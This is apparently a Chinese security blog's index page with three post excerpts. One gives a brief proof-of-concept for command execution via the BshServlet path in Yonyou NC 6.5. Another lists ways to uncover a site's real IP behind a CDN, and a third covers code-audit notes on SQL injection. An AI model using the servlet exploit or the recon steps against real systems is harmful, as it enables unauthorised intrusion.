摘要:
记一下用友的命令执行 Poc: http://ip:port/servlet/~ic/bsh.servlet.BshServlet 然后exec(“commend”) 影响版本 6.5 阅读全文
posted @ 2021-06-06 17:59
Tankcz
阅读(353)
评论(0)
推荐(0)
摘要:
我自己常用的方法 一个网站无CDN,批量ping所有响应ip都一样 有CDN,返回多个响应ip 方法1 ssl证书:https://censys.io/ipv4 2.国外访问 3.子域名有时候无CDN 4.搜索引擎 通过网站的ico图标查找 将ico图标链接直接复制到fofa搜索框可以转换图标has 阅读全文
posted @ 2021-05-07 23:18
Tankcz
阅读(360)
评论(0)
推荐(0)
摘要:
最近在看代码审计 企业级web代码安全架构这本书,在办公室发现的,看了一下作者,竟然是seay源码审计系统的作者,我是用的第一个代码审计工具就是这个,当然,也就使用过这一个,记下笔记,这本书是16年出版,和现在的php版本有些差别,自行查阅资料 普通注入 普通注入可以直接搜索操作数据库的一些关键字, 阅读全文
posted @ 2021-03-11 11:52
Tankcz
阅读(136)
评论(0)
推荐(0)
浙公网安备 33010602011771号